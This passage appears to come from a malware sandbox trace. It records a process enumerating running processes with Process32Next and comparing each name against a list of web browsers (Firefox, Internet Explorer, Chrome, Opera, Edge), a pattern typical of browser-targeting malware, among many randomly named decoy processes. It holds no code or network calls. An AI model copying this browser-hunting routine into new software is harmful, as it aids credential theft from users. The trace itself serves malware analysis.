th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0189.572] lstrcmpiA (lpString1="lsm.exe", lpString2="firefox.exe") returned 1 [0189.572] lstrcmpiA (lpString1="lsm.exe", lpString2="iexplore.exe") returned 1 [0189.572] lstrcmpiA (lpString1="lsm.exe", lpString2="chrome.exe") returned 1 [0189.572] lstrcmpiA (lpString1="lsm.exe", lpString2="opera.exe") returned -1 [0189.572] lstrcmpiA (lpString1="lsm.exe", lpString2="microsoftedgecp.exe") returned -1 [0189.572] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0189.572] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0189.573] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0189.573] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0189.573] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0189.573] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0189.573] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0189.573] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0189.573] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0189.573] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0189.573] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0189.573] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0189.573] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0189.574] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0189.574] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0189.574] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0189.574] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0189.574] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0189.574] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0189.574] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0189.574] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0189.574] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0189.574] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0189.574] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0189.574] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0189.575] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0189.575] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0189.575] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0189.575] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0189.575] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0189.575] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0189.575] lstrcmpiA (lpString1="audiodg.exe", lpString2="firefox.exe") returned -1 [0189.575] lstrcmpiA (lpString1="audiodg.exe", lpString2="iexplore.exe") returned -1 [0189.575] lstrcmpiA (lpString1="audiodg.exe", lpString2="chrome.exe") returned -1 [0189.575] lstrcmpiA (lpString1="audiodg.exe", lpString2="opera.exe") returned -1 [0189.575] lstrcmpiA (lpString1="audiodg.exe", lpString2="microsoftedgecp.exe") returned -1 [0189.576] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0189.576] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0189.576] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0189.576] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0189.576] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0189.576] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0189.576] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0189.577] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0189.577] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0189.577] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0189.577] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0189.577] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0189.577] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0189.577] lstrcmpiA (lpString1="dwm.exe", lpString2="firefox.exe") returned -1 [0189.577] lstrcmpiA (lpString1="dwm.exe", lpString2="iexplore.exe") returned -1 [0189.577] lstrcmpiA (lpString1="dwm.exe", lpString2="chrome.exe") returned 1 [0189.577] lstrcmpiA (lpString1="dwm.exe", lpString2="opera.exe") returned -1 [0189.577] lstrcmpiA (lpString1="dwm.exe", lpString2="microsoftedgecp.exe") returned -1 [0189.577] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0189.578] lstrcmpiA (lpString1="spoolsv.exe", lpString2="firefox.exe") returned 1 [0189.578] lstrcmpiA (lpString1="spoolsv.exe", lpString2="iexplore.exe") returned 1 [0189.578] lstrcmpiA (lpString1="spoolsv.exe", lpString2="chrome.exe") returned 1 [0189.578] lstrcmpiA (lpString1="spoolsv.exe", lpString2="opera.exe") returned 1 [0189.578] lstrcmpiA (lpString1="spoolsv.exe", lpString2="microsoftedgecp.exe") returned 1 [0189.578] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0189.578] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0189.578] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0189.578] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0189.578] lstrcmpiA (lpString1="taskhost.exe", lpString2="opera.exe") returned 1 [0189.578] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0189.578] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0189.579] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0189.579] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0189.579] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0189.579] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0189.579] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0189.579] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0189.579] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0189.579] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0189.580] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0189.580] lstrcmpiA (lpString1="taskeng.exe", lpString2="opera.exe") returned 1 [0189.580] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0189.580] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0189.580] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="firefox.exe") returned -1 [0189.580] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="iexplore.exe") returned -1 [0189.580] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="chrome.exe") returned -1 [0189.580] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="opera.exe") returned -1 [0189.580] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="microsoftedgecp.exe") returned -1 [0189.580] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0189.581] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="firefox.exe") returned -1 [0189.581] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="iexplore.exe") returned -1 [0189.581] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="chrome.exe") returned -1 [0189.581] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="opera.exe") returned -1 [0189.581] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="microsoftedgecp.exe") returned -1 [0189.581] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0189.581] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="firefox.exe") returned 1 [0189.581] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="iexplore.exe") returned 1 [0189.581] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="chrome.exe") returned 1 [0189.581] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="opera.exe") returned 1 [0189.581] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="microsoftedgecp.exe") returned 1 [0189.582] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0189.582] lstrcmpiA (lpString1="definitely.exe", lpString2="firefox.exe") returned -1 [0189.582] lstrcmpiA (lpString1="definitely.exe", lpString2="iexplore.exe") returned -1 [0189.582] lstrcmpiA (lpString1="definitely.exe", lpString2="chrome.exe") returned 1 [0189.582] lstrcmpiA (lpString1="definitely.exe", lpString2="opera.exe") returned -1 [0189.582] lstrcmpiA (lpString1="definitely.exe", lpString2="microsoftedgecp.exe") returned -1 [0189.582] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0189.583] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="firefox.exe") returned 1 [0189.583] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="iexplore.exe") returned 1 [0189.583] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="chrome.exe") returned 1 [0189.583] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="opera.exe") returned -1 [0189.583] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="microsoftedgecp.exe") returned -1 [0189.583] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0189.583] lstrcmpiA (lpString1="whenever.exe", lpString2="firefox.exe") returned 1 [0189.583] lstrcmpiA (lpString1="whenever.exe", lpString2="iexplore.exe") returned 1 [0189.583] lstrcmpiA (lpString1="whenever.exe", lpString2="chrome.exe") returned 1 [0189.583] lstrcmpiA (lpString1="whenever.exe", lpString2="opera.exe") returned 1 [0189.583] lstrcmpiA (lpString1="whenever.exe", lpString2="microsoftedgecp.exe") returned 1 [0189.583] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0189.584] lstrcmpiA (lpString1="potentially.exe", lpString2="firefox.exe") returned 1 [0189.584] lstrcmpiA (lpString1="potentially.exe", lpString2="iexplore.exe") returned 1 [0189.584] lstrcmpiA (lpString1="potentially.exe", lpString2="chrome.exe") returned 1 [0189.584] lstrcmpiA (lpString1="potentially.exe", lpString2="opera.exe") returned 1 [0189.584] lstrcmpiA (lpString1="potentially.exe", lpString2="microsoftedgecp.exe") returned 1 [0189.584] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0189.584] lstrcmpiA (lpString1="seeker.exe", lpString2="firefox.exe") returned 1 [0189.584] lstrcmpiA (lpString1="seeker.exe", lpString2="iexplore.exe") returned 1 [0189.584] lstrcmpiA (lpString1="seeker.exe", lpString2="chrome.exe") returned 1 [0189.584] lstrcmpiA (lpString1="seeker.exe", lpString2="opera.exe") returned 1 [0189.584] lstrcmpiA (lpString1="seeker.exe", lpString2="microsoftedgecp.exe") returned 1 [0189.585] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0189.585] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="firefox.exe") returned 1 [0189.585] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="iexplore.exe") returned 1 [0189.585] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="chrome.exe") returned 1 [0189.585] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="opera.exe") returned -1 [0189.585] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="microsoftedgecp.exe") returned 1 [0189.585] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0189.586] lstrcmpiA (lpString1="birth bean.exe", lpString2="firefox.exe") returned -1 [0189.586] lstrcmpiA (lpString1="birth bean.exe", lpString2="iexplore.exe") returned -1 [0189.586] lstrcmpiA (lpString1="birth bean.exe", lpString2="chrome.exe") returned -1 [0189.586] lstrcmpiA (lpString1="birth bean.exe", lpString2="opera.exe") returned -1 [0189.586] lstrcmpiA (lpString1="birth bean.exe", lpString2="microsoftedgecp.exe") returned -1 [0189.586] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0189.586] lstrcmpiA (lpString1="ruby.exe", lpString2="firefox.exe") returned 1 [0189.586] lstrcmpiA (lpString1="ruby.exe", lpString2="iexplore.exe") returned 1 [0189.586] lstrcmpiA (lpString1="ruby.exe", lpString2="chrome.exe") returned 1 [0189.586] lstrcmpiA (lpString1="ruby.exe", lpString2="opera.exe") returned 1 [0189.586] lstrcmpiA (lpString1="ruby.exe", lpString2="microsoftedgecp.exe") returned 1 [0189.586] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0189.587] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="firefox.exe") returned 1 [0189.587] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="iexplore.exe") returned 1 [0189.587] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="chrome.exe") returned 1 [0189.587] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="opera.exe") returned 1 [0189.587] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="microsoftedgecp.exe") returned 1 [0189.587] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0189.587] lstrcmpiA (lpString1="smith.exe", lpString2="firefox.exe") returned 1 [0189.587] lstrcmpiA (lpString1="smith.exe", lpString2="iexplore.exe") returned 1 [0189.587] lstrcmpiA (lpString1="smith.exe", lpString2="chrome.exe") returned 1 [0189.587] lstrcmpiA (lpString1="smith.exe", lpString2="opera.exe") returned 1 [0189.587] lstrcmpiA (lpString1="smith.exe", lpString2="microsoftedgecp.exe") returned 1 [0189.587] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0189.588] lstrcmpiA (lpString1="spicedespite.exe", lpString2="firefox.exe") returned 1 [0189.588] lstrcmpiA (lpString1="spicedespite.exe", lpString2="iexplore.exe") returned 1 [0189.588] lstrcmpiA (lpString1="spicedespite.exe", lpString2="chrome.exe") returned 1 [0189.588] lstrcmpiA (lpString1="spicedespite.exe", lpString2="opera.exe") returned 1 [0189.588] lstrcmpiA (lpString1="spicedespite.exe", lpString2="microsoftedgecp.exe") returned 1 [0189.588] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0189.589] lstrcmpiA (lpString1="wooden.exe", lpString2="firefox.exe") returned 1 [0189.589] lstrcmpiA (lpString1="wooden.exe", lpString2="iexplore.exe") returned 1 [0189.589] lstrcmpiA (lpString1="wooden.exe", lpString2="chrome.exe") returned 1 [0189.589] lstrcmpiA (lpString1="wooden.exe", lpString2="opera.exe") returned 1 [0189.589] lstrcmpiA (lpString1="wooden.exe", lpString2="microsoftedgecp.exe") returned 1 [0189.589] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0189.589] lstrcmpiA (lpString1="dallasr.exe", lpString2="firefox.exe") returned -1 [0189.589] lstrcmpiA (lpString1="dallasr.exe", lpString2="iexplore.exe") returned -1 [0189.589] lstrcmpiA (lpString1="dallasr.exe", lpString2="chrome.exe") returned 1 [0189.589] lstrcmpiA (lpString1="dallasr.exe", lpString2="opera.exe") returned -1 [0189.589] lstrcmpiA (lpString1="dallasr.exe", lpString2="microsoftedgecp.exe") returned -1 [0189.589] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0189.590] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="firefox.exe") returned -1 [0189.590] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="iexplore.exe") returned -1 [0189.590] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="chrome.exe") returned -1 [0189.590] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="opera.exe") returned -1 [0189.590] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="microsoftedgecp.exe") returned -1 [0189.590] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0189.590] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="firefox.exe") returned -1 [0189.590] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="iexplore.exe") returned -1 [0189.590] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="chrome.exe") returned 1 [0189.590] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="opera.exe") returned -1 [0189.590] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="microsoftedgecp.exe") returned -1 [0189.590] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0189.591] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="firefox.exe") returned 1 [0189.591] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="iexplore.exe") returned 1 [0189.591] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="chrome.exe") returned 1 [0189.591] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="opera.exe") returned 1 [0189.591] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="microsoftedgecp.exe") returned 1 [0189.591] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0189.591] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="firefox.exe") returned -1 [0189.591] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="iexplore.exe") returned -1 [0189.591] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="chrome.exe") returned 1 [0189.592] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="opera.exe") returned -1 [0189.592] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="microsoftedgecp.exe") returned -1 [0189.592] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0189.592] lstrcmpiA (lpString1="population openings.exe", lpString2="firefox.exe") returned 1 [0189.592] lstrcmpiA (lpString1="population openings.exe", lpString2="iexplore.exe") returned 1 [0189.592] lstrcmpiA (lpString1="population openings.exe", lpString2="chrome.exe") returned 1 [0189.592] lstrcmpiA (lpString1="population openings.exe", lpString2="opera.exe") returned 1 [0189.592] lstrcmpiA (lpString1="population openings.exe", lpString2="microsoftedgecp.exe") returned 1 [0189.592] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0189.593] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0189.593] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0189.593] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0189.593] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="opera.exe") returned 1 [0189.593] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0189.593] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0189.593] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0189.593] lstrcmpiA (lpString1="svchost.exe", 